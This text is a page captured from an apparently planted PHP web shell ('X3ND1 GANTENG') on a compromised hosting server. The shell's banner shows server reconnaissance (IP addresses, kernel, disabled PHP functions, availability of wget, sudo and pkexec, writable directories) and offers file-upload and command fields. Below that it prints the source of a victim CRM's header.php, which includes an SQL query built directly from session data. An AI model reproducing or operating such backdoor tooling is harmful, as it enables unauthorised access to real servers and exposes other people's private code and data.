X3ND1 GANTENG
Server IP : 108.163.255.210  /  Your IP : 3.139.79.187
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User :  ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/unilinki/www/Intellilead/template/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ BERANDA ]     

Current File : /home/unilinki/www/Intellilead/template/header.php
<?php
require_once "../includes/authenticate.php";
$logo_title_arr=explode(" ",$ss_title,2);
$logo_html ='<font class="title-0">'.$logo_title_arr[0].'</font>';
if($logo_title_arr[1]!="")
$logo_html .='<font class="title-t"> '.$logo_title_arr[1].'</font>';
$actionlist=array("1"=>"Add", "2"=>"Edit", "3"=>"Delete", "4"=>"Status");
$action_menu= explode(',',$_SESSION['action']);
$userlist=array("0"=>"Super Admin", "1"=>"Admin", "2"=>"HR Manager");

    $cid = $_SESSION['company_id'];
    $line_ss = getSingleRow("SELECT * FROM mstr_company WHERE company_id='$cid';");
	if(!empty($line_ss)){
		$ss_title=$line_ss['title'];
		$ss_logo=$line_ss['logo'];
		$company_name=$line_ss['company_name'];
		$email_id=$line_ss['email_id'];
		$phone_no=$line_ss['phone_no'];
		$mobile=$line_ss['mobile'];
		$website=$line_ss['website'];
		$alternate_phone=$line_ss['alternate_phone'];
		$alternate_email=$line_ss['alternate_email'];
		$address=$line_ss['address'];
		
	}
?>		
<!DOCTYPE html>
<html lang="en">
<head>
	
	<meta charset="utf-8">
	<meta name="description" content="<?php echo $company_name;?>">
	<meta name="author" content="<?php echo $company_name;?>">
	<meta name="keyword" content="">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title><?php echo $company_name;?></title>

  <!-- start: Css -->
  <link rel="stylesheet" type="text/css" href="../asset/css/bootstrap.min.css">

  <!-- plugins -->
  <link rel="stylesheet" type="text/css" href="../asset/css/plugins/font-awesome.min.css"/>
  <link rel="stylesheet" type="text/css" href="../asset/css/plugins/simple-line-icons.css"/>
  <link rel="stylesheet" type="text/css" href="../asset/css/plugins/animate.min.css"/>  
  <link rel="stylesheet" type="text/css" href="../asset/css/plugins/bootstrap-material-datetimepicker.css"/>
  <!--file upload-->
  <link rel="stylesheet" type="text/css" href="../asset/css/bootstrap-fileupload.min.css" />	
   <link rel="stylesheet" type="text/css" href="//cdn.datatables.net/1.10.16/css/jquery.dataTables.css">  
  <link href="../asset/css/style.css" rel="stylesheet">
  <!-- end: Css -->  
  <script type="text/javascript">
		function StripSpecialCharacters(characterTotal)
			{
				var chars = /^([A-Za-z0-9\ ])$/;
				var newChar = "";
				var oldChar = characterTotal.split("");
				for(var q=0; q<oldChar.length;q++){
					if(oldChar[q].match(chars))
					{
						newChar = newChar + oldChar[q].toString();
					}
				}
				return newChar;
			}
			function createTitle(tVal, toId){
				//alert(tVal);
				tVal=tVal.replace(/(\-|\s)+/g, ' ');
				tVal=StripSpecialCharacters(tVal);
				document.getElementById(toId).value = tVal;
			}
			function createUrl(tVal, toId){
				//alert(tVal);
				tVal=tVal.trim().replace(/\-+/g, ' ');
				tVal=StripSpecialCharacters(tVal);
				tVal=tVal.replace(/\s+/g, '-').toLowerCase();
				document.getElementById(toId).value = tVal;
			}
  </script>

  <link rel="shortcut icon" href="../asset/img/logomi.png">
  <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
      <![endif]-->
    </head>

<body id="mimin" class="dashboard">
      <!-- start: Header -->
        <nav class="navbar navbar-default header navbar-fixed-top">
          <div class="col-md-12 nav-wrapper">
            <div class="navbar-header" style="width:100%;">
              <div class="opener-left-menu is-open">
                <span class="top"></span>
                <span class="middle"></span>
                <span class="bottom"></span>
              </div>
                <a href="#" class="navbar-brand"> 
                 <b><?php echo $company_name;?> </b>
                </a>

              <ul class="nav navbar-nav search-nav">
                <li>
                  <form action="<?php echo $SITE_PATH; ?>leads/search.php" method="post">
                   <div class="search">
                    <button type="submit" style="background:transparent;border:transparent;"><span class="fa fa-search icon-search" style="font-size:23px;"></span></button>
                    <div class="form-group form-animate-text">
                      <input type="text" name="s" class="form-text" required>
                      <span class="bar"></span>
                      <label class="label-search">Type anywhere to <b>Search</b> </label>
                    </div>					
                  </div>
				  </form>
                </li>
              </ul>

              <ul class="nav navbar-nav navbar-right user-nav">
                <li class="user-name"><span><?php echo $_SESSION['name']; ?></span></li>
                  <li class="dropdown avatar-dropdown">
				  
                   <img src="../resources/<?php if($_SESSION['image']!=''){ echo $_SESSION['image_path'].$_SESSION['image']; }else{echo "no_user.jpg";}?>" alt="<?php echo $_SESSION['user_name']; ?><?php echo $_SESSION['user_id']; ?>" class="img-circle avatar" alt="user name" data-toggle="dropdown" aria-haspopup="true" aria-expanded="true"/>
                  
				  <ul class="dropdown-menu user-dropdown">
                     <li><a href="../users/profile_edit.php"><span class="fa fa-user"></span> My Profile</a></li>
                     <li><a href="../logout.php"><span class="fa fa-power-off"></span> Logout</a></li>
                     <li role="separator" class="divider"></li>                   
                  </ul>
                </li>
                <li ><a href="#" class="opener-right-menu"><span class="fa fa-coffee"></span></a></li>
              </ul>
            </div>
          </div>
        </nav>
      <!-- end: Header -->		
<div class="container-fluid mimin-wrapper">	  
		<?php include('sidebar.php');?>
		 <!-- start: Content -->
            <div id="content">

Anon7 - 2022
SCDN GOK